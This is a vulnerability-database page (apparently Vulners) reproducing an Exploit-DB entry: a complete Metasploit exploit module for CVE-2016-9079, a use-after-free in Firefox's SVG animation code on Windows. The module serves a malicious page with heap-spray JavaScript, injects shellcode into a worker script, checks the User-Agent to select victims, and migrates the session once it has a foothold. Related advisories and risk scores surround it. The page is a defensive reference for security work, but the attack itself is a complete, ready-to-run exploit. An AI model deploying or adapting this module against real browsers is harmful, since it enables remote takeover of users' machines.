Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)

🗓️ 24 Jan 2017 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 242 Views

Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Mozilla Firefox nsSMILTimeContainer::NotifyTimeChange() Remote Code Execution Exploit
24 Jan 201700:00
zdt
0day.today		Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution Exploit
15 Jul 201700:00
zdt
0day.today		Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution Exploit
17 Mar 201800:00
zdt
0day.today		Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution Exploit
17 Mar 201800:00
zdt
FreeBSD		Mozilla -- SVG Animation Remote Code Execution
30 Nov 201600:00
freebsd
GithubExploit		Exploit for Use After Free in Debian Debian_Linux
29 Jul 201812:55
githubexploit
IBM Security Bulletins		Security Bulletin: Mozilla Firefox vulnerability issues in IBM SONAS
18 Jun 201800:32
ibm
IBM Security Bulletins		Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM Storwize V7000 Unified.
18 Jun 201800:32
ibm
Tenable Nessus		Mozilla Firefox < 50.0.2 RCE
5 Jan 201700:00
nessus
Tenable Nessus		Mozilla Firefox ESR < 45.5.1 RCE
5 Jan 201700:00
nessus
Rows per page
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

  class MetasploitModule < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpServer

    def initialize(info={})
      super(update_info(info,
        'Name'           => "Firefox nsSMILTimeContainer::NotifyTimeChange() RCE",
        'Description'    => %q{
          This module exploits an out-of-bounds indexing/use-after-free condition present in
          nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox
          on Microsoft Windows.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
          [
            'Anonymous Gaijin',                                 # Original research/exploit
            'William Webb <william_webb[at]rapid7.com>'         # Metasploit module
          ],
          'Platform'       => 'win',
          'Targets'        =>
          [
            [ 'Mozilla Firefox',
              {
                'Platform' => 'win',
                'Arch'     => ARCH_X86,
              }
            ],
          ],
          'DefaultOptions'  =>
          {
            'EXITFUNC' => "thread",
            'InitialAutoRunScript' => 'migrate -f'
          },
          'References'     =>
          [
            [ 'CVE', '2016-9079' ],
            [ 'Bugzilla', '1321066' ]
          ],
          'Arch'           => ARCH_X86,
          'DisclosureDate' => "Nov 30 2016",
          'DefaultTarget'  => 0
        )
      )
    register_options(
      [
        OptBool.new('UsePostHTML', [ true, 'Rewrite page with arbitrary HTML after successful exploitation.  NOTE: if set to true, you should probably rewrite data/exploits/ff_smil_uaf/post.html to something useful!', false ]),
      ], self.class
    )
  end

  def exploit_html(cli)
    p = payload.encoded
    arch = Rex::Arch.endian(target.arch)
    payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
    base_uri = "#{get_resource.chomp('/')}"

    # stuff that gets adjusted alot during testing

    defrag_x = %Q~
       for (var i = 0; i < 0x4000; i++)
         heap80[i] = block80.slice(0)
     ~
     defrag_y = %Q~
       for (var i = 0x4401; i < heap80.length; i++)
         heap80[i] = block80.slice(0)
     ~

    js = %Q~
    var worker = new Worker('#{base_uri}/worker.js');
    var svgns = 'http://www.w3.org/2000/svg';
    var heap80 = new Array(0x5000);
    var heap100 = new Array(0x5000);
    var block80 = new ArrayBuffer(0x80);
    var block100 = new ArrayBuffer(0x100);
    var sprayBase = undefined;
    var arrBase = undefined;

    var animateX = undefined;
    var containerA = undefined;

    var milestone_offset = 0x90;

    var $ = function(id) { return document.getElementById(id); }

    var heap = function()
    {
     var u32 = new Uint32Array(block80)

     u32[4] = arrBase - milestone_offset;

     u32[0xa] = arrBase + 0x1000 - milestone_offset;

     u32[0x10] = arrBase + 0x2000 - milestone_offset;

     var x = document.createElementNS(svgns, 'animate')
     var svg = document.createElementNS(svgns, 'svg')

     svg.appendChild(x)
     svg.appendChild(x.cloneNode(true))

     for (var i = 0; i < 0x400; i++)
       {
         var node = svg.cloneNode(true);
         node.setAttribute('id', 'svg' + i)
         document.body.appendChild(node);
       }
       #{defrag_x}

       for (var i = 0; i < 0x400; i++)
         {
           heap80[i + 0x3000] = block80.slice(0)
           $('svg' + i).appendChild(x.cloneNode(true))
         }

         for (var i = 0; i < 0x400; i++)
           {
             $('svg' + i).appendChild(x.cloneNode(true))
             $('svg' + i).appendChild(x.cloneNode(true))
           }

           for (var i = 0; i < heap100.length; i++)
             heap100[i] = block100.slice(0)

             #{defrag_y}

             for (var i = 0x100; i < 0x400; i++)
               $('svg' + i).appendChild(x.cloneNode(true))
             }

             var exploit = function()
             {
               heap();

               animateX.setAttribute('begin', '59s')
               animateX.setAttribute('begin', '58s')
               animateX.setAttribute('begin', '10s')
               animateX.setAttribute('begin', '9s')

               // money shot

               containerA.pauseAnimations();
             }

             worker.onmessage = function(e)
             {
              worker.onmessage = function(e)
              {
               window.setTimeout(function()
               {
                 worker.terminate();
                 document.body.innerHTML = '';
                 document.getElementsByTagName('head')[0].innerHTML = '';
                 document.body.setAttribute('onload', '')
                 document.write('<blink>')
                 }, 1000);
  }

  arrBase = e.data;
  exploit();
  }


  var idGenerator = function()
  {
   return 'id' + (((1+Math.random())*0x10000)|0).toString(16).substring(1);
  }


  var craftDOM = function()
  {
   containerA = document.createElementNS(svgns, 'svg')
   var containerB = document.createElementNS(svgns, 'svg');

   animateX = document.createElementNS(svgns, 'animate')
   var animateA = document.createElementNS(svgns, 'animate')
   var animateB = document.createElementNS(svgns, 'animate')

   var animateC = document.createElementNS(svgns, 'animate')

   var idX = idGenerator();
   var idA = idGenerator();
   var idB = idGenerator();
   var idC = idGenerator();

   animateX.setAttribute('id', idX);
   animateA.setAttribute('id', idA);
   animateA.setAttribute('end', '50s');
   animateB.setAttribute('id', idB);
   animateB.setAttribute('begin', '60s');
   animateB.setAttribute('end', idC + '.end');
   animateC.setAttribute('id', idC);
   animateC.setAttribute('begin', '10s');
   animateC.setAttribute('end', idA + '.end');

   containerA.appendChild(animateX)
   containerA.appendChild(animateA)
   containerA.appendChild(animateB)

   containerB.appendChild(animateC)

   document.body.appendChild(containerA);
   document.body.appendChild(containerB);
  }
  window.onload = craftDOM;
    ~

    # If you want to change the appearance of the landing page, do it here

    html = %Q~
    <html>
    <head>
    <meta charset="utf-8"/>
    <script>
    #{js}
    </script>
    </head>
    <body>
    </body>
    </html>
    ~

    if datastore['UsePostHTML']
      f = File.open(File.join(Msf::Config.data_directory, "exploits", "firefox_smil_uaf", "post.html"), "rb")
      c = f.read
      html = html.gsub("<blink>", c)
    else
      html = html.gsub("<blink>", "")
    end
    send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
  end

  def worker_js(cli)
    p = payload.encoded
    arch = Rex::Arch.endian(target.arch)
    payload = Rex::Text.to_unescape(p, arch)
    wt = File.open(File.join(Msf::Config.data_directory, "exploits", "firefox_smil_uaf", "worker.js"), "rb")
    c = wt.read
    c = c.gsub("INSERTSHELLCODEHEREPLZ", payload)
    c = c.gsub("NOPSGOHERE", "\u9090")
    send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
  end

  def is_ff_on_windows(user_agent)
    target_hash = fingerprint_user_agent(user_agent)
    if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
      return false
    end
      return true
  end

  def on_request_uri(cli, request)
    print_status("Got request: #{request.uri}")
    print_status("From: #{request.headers['User-Agent']}")
    if (!is_ff_on_windows(request.headers['User-Agent']))
      print_error("Unsupported user agent: #{request.headers['User-Agent']}")
      send_not_found(cli)
      close_client(cli)
      return
    end
    if request.uri =~ /worker\.js/
      print_status("Sending worker thread Javascript ...")
      worker_js(cli)
      return
    end
    if request.uri =~ /index\.html/ or request.uri =~ /\//

      print_status("Sending exploit HTML ...")
      exploit_html(cli)
      close_client(cli)
      return
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Jan 2017 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 25
CVSS 3.17.5
EPSS0.84813
SSVC
remote code executionout-of-bounds indexinguse-after-freemozilla firefoxwindowsrcemetasploitworker.jscve-2016-9079
242